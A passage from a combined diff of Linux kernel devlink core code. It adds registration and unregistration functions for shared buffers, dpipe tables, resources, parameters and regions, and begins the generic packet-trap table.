++	if (devlink_sb_index_exists(devlink, sb_index))
++		return -EEXIST;
++
++	devlink_sb = kzalloc(sizeof(*devlink_sb), GFP_KERNEL);
++	if (!devlink_sb)
++		return -ENOMEM;
++	devlink_sb->index = sb_index;
++	devlink_sb->size = size;
++	devlink_sb->ingress_pools_count = ingress_pools_count;
++	devlink_sb->egress_pools_count = egress_pools_count;
++	devlink_sb->ingress_tc_count = ingress_tc_count;
++	devlink_sb->egress_tc_count = egress_tc_count;
++	list_add_tail(&devlink_sb->list, &devlink->sb_list);
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devl_sb_register);
++
++int devlink_sb_register(struct devlink *devlink, unsigned int sb_index,
++			u32 size, u16 ingress_pools_count,
++			u16 egress_pools_count, u16 ingress_tc_count,
++			u16 egress_tc_count)
++{
++	int err;
++
++	devl_lock(devlink);
++	err = devl_sb_register(devlink, sb_index, size, ingress_pools_count,
++			       egress_pools_count, ingress_tc_count,
++			       egress_tc_count);
++	devl_unlock(devlink);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_sb_register);
++
++void devl_sb_unregister(struct devlink *devlink, unsigned int sb_index)
++{
++	struct devlink_sb *devlink_sb;
++
++	lockdep_assert_held(&devlink->lock);
++
++	devlink_sb = devlink_sb_get_by_index(devlink, sb_index);
++	WARN_ON(!devlink_sb);
++	list_del(&devlink_sb->list);
++	kfree(devlink_sb);
++}
++EXPORT_SYMBOL_GPL(devl_sb_unregister);
++
++void devlink_sb_unregister(struct devlink *devlink, unsigned int sb_index)
++{
++	devl_lock(devlink);
++	devl_sb_unregister(devlink, sb_index);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_sb_unregister);
++
++/**
++ * devl_dpipe_headers_register - register dpipe headers
++ *
++ * @devlink: devlink
++ * @dpipe_headers: dpipe header array
++ *
++ * Register the headers supported by hardware.
++ */
++void devl_dpipe_headers_register(struct devlink *devlink,
++				 struct devlink_dpipe_headers *dpipe_headers)
++{
++	lockdep_assert_held(&devlink->lock);
++
++	devlink->dpipe_headers = dpipe_headers;
++}
++EXPORT_SYMBOL_GPL(devl_dpipe_headers_register);
++
++/**
++ * devl_dpipe_headers_unregister - unregister dpipe headers
++ *
++ * @devlink: devlink
++ *
++ * Unregister the headers supported by hardware.
++ */
++void devl_dpipe_headers_unregister(struct devlink *devlink)
++{
++	lockdep_assert_held(&devlink->lock);
++
++	devlink->dpipe_headers = NULL;
++}
++EXPORT_SYMBOL_GPL(devl_dpipe_headers_unregister);
++
++/**
++ *	devlink_dpipe_table_counter_enabled - check if counter allocation
++ *					      required
++ *	@devlink: devlink
++ *	@table_name: tables name
++ *
++ *	Used by driver to check if counter allocation is required.
++ *	After counter allocation is turned on the table entries
++ *	are updated to include counter statistics.
++ *
++ *	After that point on the driver must respect the counter
++ *	state so that each entry added to the table is added
++ *	with a counter.
++ */
++bool devlink_dpipe_table_counter_enabled(struct devlink *devlink,
++					 const char *table_name)
++{
++	struct devlink_dpipe_table *table;
++	bool enabled;
++
++	rcu_read_lock();
++	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
++					 table_name, devlink);
++	enabled = false;
++	if (table)
++		enabled = table->counters_enabled;
++	rcu_read_unlock();
++	return enabled;
++}
++EXPORT_SYMBOL_GPL(devlink_dpipe_table_counter_enabled);
++
++/**
++ * devl_dpipe_table_register - register dpipe table
++ *
++ * @devlink: devlink
++ * @table_name: table name
++ * @table_ops: table ops
++ * @priv: priv
++ * @counter_control_extern: external control for counters
++ */
++int devl_dpipe_table_register(struct devlink *devlink,
++			      const char *table_name,
++			      struct devlink_dpipe_table_ops *table_ops,
++			      void *priv, bool counter_control_extern)
++{
++	struct devlink_dpipe_table *table;
++
++	lockdep_assert_held(&devlink->lock);
++
++	if (WARN_ON(!table_ops->size_get))
++		return -EINVAL;
++
++	if (devlink_dpipe_table_find(&devlink->dpipe_table_list, table_name,
++				     devlink))
++		return -EEXIST;
++
++	table = kzalloc(sizeof(*table), GFP_KERNEL);
++	if (!table)
++		return -ENOMEM;
++
++	table->name = table_name;
++	table->table_ops = table_ops;
++	table->priv = priv;
++	table->counter_control_extern = counter_control_extern;
++
++	list_add_tail_rcu(&table->list, &devlink->dpipe_table_list);
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devl_dpipe_table_register);
++
++/**
++ * devl_dpipe_table_unregister - unregister dpipe table
++ *
++ * @devlink: devlink
++ * @table_name: table name
++ */
++void devl_dpipe_table_unregister(struct devlink *devlink,
++				 const char *table_name)
++{
++	struct devlink_dpipe_table *table;
++
++	lockdep_assert_held(&devlink->lock);
++
++	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
++					 table_name, devlink);
++	if (!table)
++		return;
++	list_del_rcu(&table->list);
++	kfree_rcu(table, rcu);
++}
++EXPORT_SYMBOL_GPL(devl_dpipe_table_unregister);
++
++/**
++ * devl_resource_register - devlink resource register
++ *
++ * @devlink: devlink
++ * @resource_name: resource's name
++ * @resource_size: resource's size
++ * @resource_id: resource's id
++ * @parent_resource_id: resource's parent id
++ * @size_params: size parameters
++ *
++ * Generic resources should reuse the same names across drivers.
++ * Please see the generic resources list at:
++ * Documentation/networking/devlink/devlink-resource.rst
++ */
++int devl_resource_register(struct devlink *devlink,
++			   const char *resource_name,
++			   u64 resource_size,
++			   u64 resource_id,
++			   u64 parent_resource_id,
++			   const struct devlink_resource_size_params *size_params)
++{
++	struct devlink_resource *resource;
++	struct list_head *resource_list;
++	bool top_hierarchy;
++
++	lockdep_assert_held(&devlink->lock);
++
++	top_hierarchy = parent_resource_id == DEVLINK_RESOURCE_ID_PARENT_TOP;
++
++	resource = devlink_resource_find(devlink, NULL, resource_id);
++	if (resource)
++		return -EINVAL;
++
++	resource = kzalloc(sizeof(*resource), GFP_KERNEL);
++	if (!resource)
++		return -ENOMEM;
++
++	if (top_hierarchy) {
++		resource_list = &devlink->resource_list;
++	} else {
++		struct devlink_resource *parent_resource;
++
++		parent_resource = devlink_resource_find(devlink, NULL,
++							parent_resource_id);
++		if (parent_resource) {
++			resource_list = &parent_resource->resource_list;
++			resource->parent = parent_resource;
++		} else {
++			kfree(resource);
++			return -EINVAL;
++		}
++	}
++
++	resource->name = resource_name;
++	resource->size = resource_size;
++	resource->size_new = resource_size;
++	resource->id = resource_id;
++	resource->size_valid = true;
++	memcpy(&resource->size_params, size_params,
++	       sizeof(resource->size_params));
++	INIT_LIST_HEAD(&resource->resource_list);
++	list_add_tail(&resource->list, resource_list);
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devl_resource_register);
++
++/**
++ *	devlink_resource_register - devlink resource register
++ *
++ *	@devlink: devlink
++ *	@resource_name: resource's name
++ *	@resource_size: resource's size
++ *	@resource_id: resource's id
++ *	@parent_resource_id: resource's parent id
++ *	@size_params: size parameters
++ *
++ *	Generic resources should reuse the same names across drivers.
++ *	Please see the generic resources list at:
++ *	Documentation/networking/devlink/devlink-resource.rst
++ *
++ *	Context: Takes and release devlink->lock <mutex>.
++ */
++int devlink_resource_register(struct devlink *devlink,
++			      const char *resource_name,
++			      u64 resource_size,
++			      u64 resource_id,
++			      u64 parent_resource_id,
++			      const struct devlink_resource_size_params *size_params)
++{
++	int err;
++
++	devl_lock(devlink);
++	err = devl_resource_register(devlink, resource_name, resource_size,
++				     resource_id, parent_resource_id, size_params);
++	devl_unlock(devlink);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_resource_register);
++
++static void devlink_resource_unregister(struct devlink *devlink,
++					struct devlink_resource *resource)
++{
++	struct devlink_resource *tmp, *child_resource;
++
++	list_for_each_entry_safe(child_resource, tmp, &resource->resource_list,
++				 list) {
++		devlink_resource_unregister(devlink, child_resource);
++		list_del(&child_resource->list);
++		kfree(child_resource);
++	}
++}
++
++/**
++ * devl_resources_unregister - free all resources
++ *
++ * @devlink: devlink
++ */
++void devl_resources_unregister(struct devlink *devlink)
++{
++	struct devlink_resource *tmp, *child_resource;
++
++	lockdep_assert_held(&devlink->lock);
++
++	list_for_each_entry_safe(child_resource, tmp, &devlink->resource_list,
++				 list) {
++		devlink_resource_unregister(devlink, child_resource);
++		list_del(&child_resource->list);
++		kfree(child_resource);
++	}
++}
++EXPORT_SYMBOL_GPL(devl_resources_unregister);
++
++/**
++ *	devlink_resources_unregister - free all resources
++ *
++ *	@devlink: devlink
++ *
++ *	Context: Takes and release devlink->lock <mutex>.
++ */
++void devlink_resources_unregister(struct devlink *devlink)
++{
++	devl_lock(devlink);
++	devl_resources_unregister(devlink);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_resources_unregister);
++
++/**
++ * devl_resource_size_get - get and update size
++ *
++ * @devlink: devlink
++ * @resource_id: the requested resource id
++ * @p_resource_size: ptr to update
++ */
++int devl_resource_size_get(struct devlink *devlink,
++			   u64 resource_id,
++			   u64 *p_resource_size)
++{
++	struct devlink_resource *resource;
++
++	lockdep_assert_held(&devlink->lock);
++
++	resource = devlink_resource_find(devlink, NULL, resource_id);
++	if (!resource)
++		return -EINVAL;
++	*p_resource_size = resource->size_new;
++	resource->size = resource->size_new;
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devl_resource_size_get);
++
++/**
++ * devl_dpipe_table_resource_set - set the resource id
++ *
++ * @devlink: devlink
++ * @table_name: table name
++ * @resource_id: resource id
++ * @resource_units: number of resource's units consumed per table's entry
++ */
++int devl_dpipe_table_resource_set(struct devlink *devlink,
++				  const char *table_name, u64 resource_id,
++				  u64 resource_units)
++{
++	struct devlink_dpipe_table *table;
++
++	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
++					 table_name, devlink);
++	if (!table)
++		return -EINVAL;
++
++	table->resource_id = resource_id;
++	table->resource_units = resource_units;
++	table->resource_valid = true;
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devl_dpipe_table_resource_set);
++
++/**
++ * devl_resource_occ_get_register - register occupancy getter
++ *
++ * @devlink: devlink
++ * @resource_id: resource id
++ * @occ_get: occupancy getter callback
++ * @occ_get_priv: occupancy getter callback priv
++ */
++void devl_resource_occ_get_register(struct devlink *devlink,
++				    u64 resource_id,
++				    devlink_resource_occ_get_t *occ_get,
++				    void *occ_get_priv)
++{
++	struct devlink_resource *resource;
++
++	lockdep_assert_held(&devlink->lock);
++
++	resource = devlink_resource_find(devlink, NULL, resource_id);
++	if (WARN_ON(!resource))
++		return;
++	WARN_ON(resource->occ_get);
++
++	resource->occ_get = occ_get;
++	resource->occ_get_priv = occ_get_priv;
++}
++EXPORT_SYMBOL_GPL(devl_resource_occ_get_register);
++
++/**
++ *	devlink_resource_occ_get_register - register occupancy getter
++ *
++ *	@devlink: devlink
++ *	@resource_id: resource id
++ *	@occ_get: occupancy getter callback
++ *	@occ_get_priv: occupancy getter callback priv
++ *
++ *	Context: Takes and release devlink->lock <mutex>.
++ */
++void devlink_resource_occ_get_register(struct devlink *devlink,
++				       u64 resource_id,
++				       devlink_resource_occ_get_t *occ_get,
++				       void *occ_get_priv)
++{
++	devl_lock(devlink);
++	devl_resource_occ_get_register(devlink, resource_id,
++				       occ_get, occ_get_priv);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_resource_occ_get_register);
++
++/**
++ * devl_resource_occ_get_unregister - unregister occupancy getter
++ *
++ * @devlink: devlink
++ * @resource_id: resource id
++ */
++void devl_resource_occ_get_unregister(struct devlink *devlink,
++				      u64 resource_id)
++{
++	struct devlink_resource *resource;
++
++	lockdep_assert_held(&devlink->lock);
++
++	resource = devlink_resource_find(devlink, NULL, resource_id);
++	if (WARN_ON(!resource))
++		return;
++	WARN_ON(!resource->occ_get);
++
++	resource->occ_get = NULL;
++	resource->occ_get_priv = NULL;
++}
++EXPORT_SYMBOL_GPL(devl_resource_occ_get_unregister);
++
++/**
++ *	devlink_resource_occ_get_unregister - unregister occupancy getter
++ *
++ *	@devlink: devlink
++ *	@resource_id: resource id
++ *
++ *	Context: Takes and release devlink->lock <mutex>.
++ */
++void devlink_resource_occ_get_unregister(struct devlink *devlink,
++					 u64 resource_id)
++{
++	devl_lock(devlink);
++	devl_resource_occ_get_unregister(devlink, resource_id);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_resource_occ_get_unregister);
++
++static int devlink_param_verify(const struct devlink_param *param)
++{
++	if (!param || !param->name || !param->supported_cmodes)
++		return -EINVAL;
++	if (param->generic)
++		return devlink_param_generic_verify(param);
++	else
++		return devlink_param_driver_verify(param);
++}
++
++/**
++ *	devlink_params_register - register configuration parameters
++ *
++ *	@devlink: devlink
++ *	@params: configuration parameters array
++ *	@params_count: number of parameters provided
++ *
++ *	Register the configuration parameters supported by the driver.
++ */
++int devlink_params_register(struct devlink *devlink,
++			    const struct devlink_param *params,
++			    size_t params_count)
++{
++	const struct devlink_param *param = params;
++	int i, err;
++
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++
++	for (i = 0; i < params_count; i++, param++) {
++		err = devlink_param_register(devlink, param);
++		if (err)
++			goto rollback;
++	}
++	return 0;
++
++rollback:
++	if (!i)
++		return err;
++
++	for (param--; i > 0; i--, param--)
++		devlink_param_unregister(devlink, param);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_params_register);
++
++/**
++ *	devlink_params_unregister - unregister configuration parameters
++ *	@devlink: devlink
++ *	@params: configuration parameters to unregister
++ *	@params_count: number of parameters provided
++ */
++void devlink_params_unregister(struct devlink *devlink,
++			       const struct devlink_param *params,
++			       size_t params_count)
++{
++	const struct devlink_param *param = params;
++	int i;
++
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++
++	for (i = 0; i < params_count; i++, param++)
++		devlink_param_unregister(devlink, param);
++}
++EXPORT_SYMBOL_GPL(devlink_params_unregister);
++
++/**
++ * devlink_param_register - register one configuration parameter
++ *
++ * @devlink: devlink
++ * @param: one configuration parameter
++ *
++ * Register the configuration parameter supported by the driver.
++ * Return: returns 0 on successful registration or error code otherwise.
++ */
++int devlink_param_register(struct devlink *devlink,
++			   const struct devlink_param *param)
++{
++	struct devlink_param_item *param_item;
++
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++
++	WARN_ON(devlink_param_verify(param));
++	WARN_ON(devlink_param_find_by_name(&devlink->param_list, param->name));
++
++	if (param->supported_cmodes == BIT(DEVLINK_PARAM_CMODE_DRIVERINIT))
++		WARN_ON(param->get || param->set);
++	else
++		WARN_ON(!param->get || !param->set);
++
++	param_item = kzalloc(sizeof(*param_item), GFP_KERNEL);
++	if (!param_item)
++		return -ENOMEM;
++
++	param_item->param = param;
++
++	list_add_tail(&param_item->list, &devlink->param_list);
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_param_register);
++
++/**
++ * devlink_param_unregister - unregister one configuration parameter
++ * @devlink: devlink
++ * @param: configuration parameter to unregister
++ */
++void devlink_param_unregister(struct devlink *devlink,
++			      const struct devlink_param *param)
++{
++	struct devlink_param_item *param_item;
++
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++
++	param_item =
++		devlink_param_find_by_name(&devlink->param_list, param->name);
++	WARN_ON(!param_item);
++	list_del(&param_item->list);
++	kfree(param_item);
++}
++EXPORT_SYMBOL_GPL(devlink_param_unregister);
++
++/**
++ *	devlink_param_driverinit_value_get - get configuration parameter
++ *					     value for driver initializing
++ *
++ *	@devlink: devlink
++ *	@param_id: parameter ID
++ *	@init_val: value of parameter in driverinit configuration mode
++ *
++ *	This function should be used by the driver to get driverinit
++ *	configuration for initialization after reload command.
++ */
++int devlink_param_driverinit_value_get(struct devlink *devlink, u32 param_id,
++				       union devlink_param_value *init_val)
++{
++	struct devlink_param_item *param_item;
++
++	if (!devlink_reload_supported(devlink->ops))
++		return -EOPNOTSUPP;
++
++	param_item = devlink_param_find_by_id(&devlink->param_list, param_id);
++	if (!param_item)
++		return -EINVAL;
++
++	if (!param_item->driverinit_value_valid ||
++	    !devlink_param_cmode_is_supported(param_item->param,
++					      DEVLINK_PARAM_CMODE_DRIVERINIT))
++		return -EOPNOTSUPP;
++
++	if (param_item->param->type == DEVLINK_PARAM_TYPE_STRING)
++		strcpy(init_val->vstr, param_item->driverinit_value.vstr);
++	else
++		*init_val = param_item->driverinit_value;
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_param_driverinit_value_get);
++
++/**
++ *	devlink_param_driverinit_value_set - set value of configuration
++ *					     parameter for driverinit
++ *					     configuration mode
++ *
++ *	@devlink: devlink
++ *	@param_id: parameter ID
++ *	@init_val: value of parameter to set for driverinit configuration mode
++ *
++ *	This function should be used by the driver to set driverinit
++ *	configuration mode default value.
++ */
++int devlink_param_driverinit_value_set(struct devlink *devlink, u32 param_id,
++				       union devlink_param_value init_val)
++{
++	struct devlink_param_item *param_item;
++
++	ASSERT_DEVLINK_NOT_REGISTERED(devlink);
++
++	param_item = devlink_param_find_by_id(&devlink->param_list, param_id);
++	if (!param_item)
++		return -EINVAL;
++
++	if (!devlink_param_cmode_is_supported(param_item->param,
++					      DEVLINK_PARAM_CMODE_DRIVERINIT))
++		return -EOPNOTSUPP;
++
++	if (param_item->param->type == DEVLINK_PARAM_TYPE_STRING)
++		strcpy(param_item->driverinit_value.vstr, init_val.vstr);
++	else
++		param_item->driverinit_value = init_val;
++	param_item->driverinit_value_valid = true;
++	return 0;
++}
++EXPORT_SYMBOL_GPL(devlink_param_driverinit_value_set);
++
++/**
++ *	devlink_param_value_changed - notify devlink on a parameter's value
++ *				      change. Should be called by the driver
++ *				      right after the change.
++ *
++ *	@devlink: devlink
++ *	@param_id: parameter ID
++ *
++ *	This function should be used by the driver to notify devlink on value
++ *	change, excluding driverinit configuration mode.
++ *	For driverinit configuration mode driver should use the function
++ */
++void devlink_param_value_changed(struct devlink *devlink, u32 param_id)
++{
++	struct devlink_param_item *param_item;
++
++	param_item = devlink_param_find_by_id(&devlink->param_list, param_id);
++	WARN_ON(!param_item);
++
++	devlink_param_notify(devlink, 0, param_item, DEVLINK_CMD_PARAM_NEW);
++}
++EXPORT_SYMBOL_GPL(devlink_param_value_changed);
++
++/**
++ * devl_region_create - create a new address region
++ *
++ * @devlink: devlink
++ * @ops: region operations and name
++ * @region_max_snapshots: Maximum supported number of snapshots for region
++ * @region_size: size of region
++ */
++struct devlink_region *devl_region_create(struct devlink *devlink,
++					  const struct devlink_region_ops *ops,
++					  u32 region_max_snapshots,
++					  u64 region_size)
++{
++	struct devlink_region *region;
++
++	devl_assert_locked(devlink);
++
++	if (WARN_ON(!ops) || WARN_ON(!ops->destructor))
++		return ERR_PTR(-EINVAL);
++
++	if (devlink_region_get_by_name(devlink, ops->name))
++		return ERR_PTR(-EEXIST);
++
++	region = kzalloc(sizeof(*region), GFP_KERNEL);
++	if (!region)
++		return ERR_PTR(-ENOMEM);
++
++	region->devlink = devlink;
++	region->max_snapshots = region_max_snapshots;
++	region->ops = ops;
++	region->size = region_size;
++	INIT_LIST_HEAD(&region->snapshot_list);
++	mutex_init(&region->snapshot_lock);
++	list_add_tail(&region->list, &devlink->region_list);
++	devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_NEW);
++
++	return region;
++}
++EXPORT_SYMBOL_GPL(devl_region_create);
++
++/**
++ *	devlink_region_create - create a new address region
++ *
++ *	@devlink: devlink
++ *	@ops: region operations and name
++ *	@region_max_snapshots: Maximum supported number of snapshots for region
++ *	@region_size: size of region
++ *
++ *	Context: Takes and release devlink->lock <mutex>.
++ */
++struct devlink_region *
++devlink_region_create(struct devlink *devlink,
++		      const struct devlink_region_ops *ops,
++		      u32 region_max_snapshots, u64 region_size)
++{
++	struct devlink_region *region;
++
++	devl_lock(devlink);
++	region = devl_region_create(devlink, ops, region_max_snapshots,
++				    region_size);
++	devl_unlock(devlink);
++	return region;
++}
++EXPORT_SYMBOL_GPL(devlink_region_create);
++
++/**
++ *	devlink_port_region_create - create a new address region for a port
++ *
++ *	@port: devlink port
++ *	@ops: region operations and name
++ *	@region_max_snapshots: Maximum supported number of snapshots for region
++ *	@region_size: size of region
++ *
++ *	Context: Takes and release devlink->lock <mutex>.
++ */
++struct devlink_region *
++devlink_port_region_create(struct devlink_port *port,
++			   const struct devlink_port_region_ops *ops,
++			   u32 region_max_snapshots, u64 region_size)
++{
++	struct devlink *devlink = port->devlink;
++	struct devlink_region *region;
++	int err = 0;
++
++	ASSERT_DEVLINK_PORT_INITIALIZED(port);
++
++	if (WARN_ON(!ops) || WARN_ON(!ops->destructor))
++		return ERR_PTR(-EINVAL);
++
++	devl_lock(devlink);
++
++	if (devlink_port_region_get_by_name(port, ops->name)) {
++		err = -EEXIST;
++		goto unlock;
++	}
++
++	region = kzalloc(sizeof(*region), GFP_KERNEL);
++	if (!region) {
++		err = -ENOMEM;
++		goto unlock;
++	}
++
++	region->devlink = devlink;
++	region->port = port;
++	region->max_snapshots = region_max_snapshots;
++	region->port_ops = ops;
++	region->size = region_size;
++	INIT_LIST_HEAD(&region->snapshot_list);
++	mutex_init(&region->snapshot_lock);
++	list_add_tail(&region->list, &port->region_list);
++	devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_NEW);
++
++	devl_unlock(devlink);
++	return region;
++
++unlock:
++	devl_unlock(devlink);
++	return ERR_PTR(err);
++}
++EXPORT_SYMBOL_GPL(devlink_port_region_create);
++
++/**
++ * devl_region_destroy - destroy address region
++ *
++ * @region: devlink region to destroy
++ */
++void devl_region_destroy(struct devlink_region *region)
++{
++	struct devlink *devlink = region->devlink;
++	struct devlink_snapshot *snapshot, *ts;
++
++	devl_assert_locked(devlink);
++
++	/* Free all snapshots of region */
++	mutex_lock(&region->snapshot_lock);
++	list_for_each_entry_safe(snapshot, ts, &region->snapshot_list, list)
++		devlink_region_snapshot_del(region, snapshot);
++	mutex_unlock(&region->snapshot_lock);
++
++	list_del(&region->list);
++	mutex_destroy(&region->snapshot_lock);
++
++	devlink_nl_region_notify(region, NULL, DEVLINK_CMD_REGION_DEL);
++	kfree(region);
++}
++EXPORT_SYMBOL_GPL(devl_region_destroy);
++
++/**
++ *	devlink_region_destroy - destroy address region
++ *
++ *	@region: devlink region to destroy
++ *
++ *	Context: Takes and release devlink->lock <mutex>.
++ */
++void devlink_region_destroy(struct devlink_region *region)
++{
++	struct devlink *devlink = region->devlink;
++
++	devl_lock(devlink);
++	devl_region_destroy(region);
++	devl_unlock(devlink);
++}
++EXPORT_SYMBOL_GPL(devlink_region_destroy);
++
++/**
++ *	devlink_region_snapshot_id_get - get snapshot ID
++ *
++ *	This callback should be called when adding a new snapshot,
++ *	Driver should use the same id for multiple snapshots taken
++ *	on multiple regions at the same time/by the same trigger.
++ *
++ *	The caller of this function must use devlink_region_snapshot_id_put
++ *	when finished creating regions using this id.
++ *
++ *	Returns zero on success, or a negative error code on failure.
++ *
++ *	@devlink: devlink
++ *	@id: storage to return id
++ */
++int devlink_region_snapshot_id_get(struct devlink *devlink, u32 *id)
++{
++	return __devlink_region_snapshot_id_get(devlink, id);
++}
++EXPORT_SYMBOL_GPL(devlink_region_snapshot_id_get);
++
++/**
++ *	devlink_region_snapshot_id_put - put snapshot ID reference
++ *
++ *	This should be called by a driver after finishing creating snapshots
++ *	with an id. Doing so ensures that the ID can later be released in the
++ *	event that all snapshots using it have been destroyed.
++ *
++ *	@devlink: devlink
++ *	@id: id to release reference on
++ */
++void devlink_region_snapshot_id_put(struct devlink *devlink, u32 id)
++{
++	__devlink_snapshot_id_decrement(devlink, id);
++}
++EXPORT_SYMBOL_GPL(devlink_region_snapshot_id_put);
++
++/**
++ *	devlink_region_snapshot_create - create a new snapshot
++ *	This will add a new snapshot of a region. The snapshot
++ *	will be stored on the region struct and can be accessed
++ *	from devlink. This is useful for future analyses of snapshots.
++ *	Multiple snapshots can be created on a region.
++ *	The @snapshot_id should be obtained using the getter function.
++ *
++ *	@region: devlink region of the snapshot
++ *	@data: snapshot data
++ *	@snapshot_id: snapshot id to be created
++ */
++int devlink_region_snapshot_create(struct devlink_region *region,
++				   u8 *data, u32 snapshot_id)
++{
++	int err;
++
++	mutex_lock(&region->snapshot_lock);
++	err = __devlink_region_snapshot_create(region, data, snapshot_id);
++	mutex_unlock(&region->snapshot_lock);
++	return err;
++}
++EXPORT_SYMBOL_GPL(devlink_region_snapshot_create);
++
++#define DEVLINK_TRAP(_id, _type)					      \
++	{								      \
++		.type = DEVLINK_TRAP_TYPE_##_type,			      \
++		.id = DEVLINK_TRAP_GENERIC_ID_##_id,			      \
++		.name = DEVLINK_TRAP_GENERIC_NAME_##_id,		      \
++	}
++
++static const struct devlink_trap devlink_trap_generic[] = {
++	DEVLINK_TRAP(SMAC_MC, DROP),
++	DEVLINK_TRAP(VLAN_TAG_MISMATCH, DROP),
++	DEVLINK_TRAP(INGRESS_VLAN_FILTER, DROP),
++	DEVLINK_TRAP(INGRESS_STP_FILTER, DROP),
++	DEVLINK_TRAP(EMPTY_TX_LIST, DROP),
++	DEVLINK_TRAP(PORT_LOOPBACK_FILTER, DROP),
++	DEVLINK_TRAP(BLACKHOLE_ROUTE, DROP),
++	DEVLINK_TRAP(TTL_ERROR, EXCEPTION),
++	DEVLINK_TRAP(TAIL_DROP, DROP),
++	DEVLINK_TRAP(NON_IP_PACKET, DROP),
++	DEVLINK_TRAP(UC_DIP_MC_DMAC, DROP),
++	DEVLINK_TRAP(DIP_LB, DROP),
++	DEVLINK_TRAP(SIP_MC, DROP),
++	DEVLINK_TRAP(SIP_LB, DROP),
++	DEVLINK_TRAP(CORRUPTED_IP_HDR, DROP),
++	DEVLINK_TRAP(IPV4_SIP_BC, DROP),
++	DEVLINK_TRAP(IPV6_MC_DIP_RESERVED_SCOPE, DROP),
++	DEVLINK_TRAP(IPV6_MC_DIP_INTERFACE_LOCAL_SCOPE, DROP),
++	DEVLINK_TRAP(MTU_ERROR, EXCEPTION),
++	DEVLINK_TRAP(UNRESOLVED_NEIGH, EXCEPTION),
++	DEVLINK_TRAP(RPF, EXCEPTION),
++	DEVLINK_TRAP(REJECT_ROUTE, EXCEPTION),
++	DEVLINK_TRAP(IPV4_LPM_UNICAST_MISS, EXCEPTION),
++	DEVLINK_TRAP(IPV6_LPM_UNICAST_MISS, EXCEPTION),
++	DEVLINK_TRAP(NON_ROUTABLE, DROP),
++	DEVLINK_TRAP(DECAP_ERROR, EXCEPTION),
++	DEVLINK_TRAP(OVERLAY_SMAC_MC, DROP),
++	DEVLINK_TRAP(INGRESS_FLOW_ACTION_DROP, DROP),
++	DEVLINK_TRAP(EGRESS_FLOW_ACTION_DROP, DROP),
++	DEVLINK_TRAP(STP, CONTROL),
++	DEVLINK_TRAP(LACP, CONTROL),
++	DEVLINK_TRAP(LLDP, CONTROL),
++	DEVLINK_TRAP(IGMP_QUERY, CONTROL),
++	DEVLINK_TRAP(IGMP_V1_REPORT, CONTROL),
++	DEVLINK_TRAP(IGMP_V2_REPORT, CONTROL),
++	DEVLINK_TRAP(IGMP_V3_REPORT, CONTROL),
++	DEVLINK_TRAP(IGMP_V2_LEAVE, CONTROL),
++	DEVLINK_TRAP(MLD_QUERY, CONTROL),
++	DEVLINK_TRAP(MLD_V1_REPORT, CONTROL),
++	DEVLINK_TRAP(MLD_V2_REPORT, CONTROL),
++	DEVLINK_TRAP(MLD_V1_DONE, CONTROL),
++	DEVLINK_TRAP(IPV4_DHCP, CONTROL),
++	DEVLINK_TRAP(IPV6_DHCP, CONTROL),
++	DEVLINK_TRAP(ARP_REQUEST, CONTROL),
++	DEVLINK_TRAP(ARP_RESPONSE, CONTROL),
++	DEVLINK_TRAP(ARP_OVERLAY, CONTROL),
++	DEVLINK_TRAP(IPV6_NEIGH_SOLICIT, CONTROL),
++	DEVLINK_TRAP(IPV6_NEIGH_ADVERT, CONTROL),
++	DEVLINK_TRAP(IPV4_BFD, CONTROL),
++	DEVLINK_TRAP(IPV6_BFD, CONTROL),
++	DEVLINK_TRAP(IPV4_OSPF, CONTROL),
++	DEVLINK_TRAP(IPV6_OSPF, CONTROL),
++	DEVLINK_TRAP(IPV4_BGP, CONTROL),
++	DEVLINK_TRAP(IPV6_BGP, CONTROL),
++	DEVLINK_TRAP(IPV4_VRRP, CONTROL),
++	DEVLINK_TRAP(IPV6_VRRP, CONTROL),
++	DEVLINK_TRAP(IPV4_PIM, CONTROL),
++	DEVLINK_TRAP(IPV6_PIM, CONTROL),
++	DEVLINK_TRAP(UC_LB, CONTROL),
++	DEVLINK_TRAP(LOCAL_ROUTE, CONTROL),
++	DEVLINK_TRAP(EXTERNAL_ROUTE, CONTROL),
++	DEVLINK_TRAP(IPV6_UC_DIP_LINK_LOCAL_SCOPE, CONTROL),
++	DEVLINK_TRAP(IPV6_DIP_ALL_NODES, CONTROL),
++	DEVLINK_TRAP(IPV6_DIP_ALL_ROUTERS, CONTROL),
++	DEVLINK_TRAP(IPV6_ROUTER_SOLICIT, CONTROL),
++	DEVLINK_TRAP(IPV6_ROUTER_ADVERT, CONTROL),
++	DEVLINK_TRAP(IPV6_REDIRECT, CONTROL),
++	DEVLINK_TRAP(IPV4_ROUTER_ALERT, CONTROL),
++	DEVLINK_TRAP(IPV6_ROUTER_ALERT, CONTROL),
++	DEVLINK_TRAP(PTP_EVENT, CONTROL),
++	DEVLINK_TRAP(PTP_GENERAL, CONTROL),
++	DEVLINK_TRAP(FLOW_ACTION_SAMPLE, CONTROL),
++	DEVLINK_TRAP(FLOW_ACTION_TRAP, CONTROL),
++	DEVLINK_TRAP(EARLY_DROP, DROP),
++	DEVLINK_TRAP(VXLAN_PARSING, DROP),
++	DEVLINK_TRAP(LLC_SNAP_PARSING, DROP),
++	DEVLINK_TRAP(VLAN_PARSING, DROP),
++	DEVLINK_TRAP(PPPOE_PPP_PARSING, DROP),
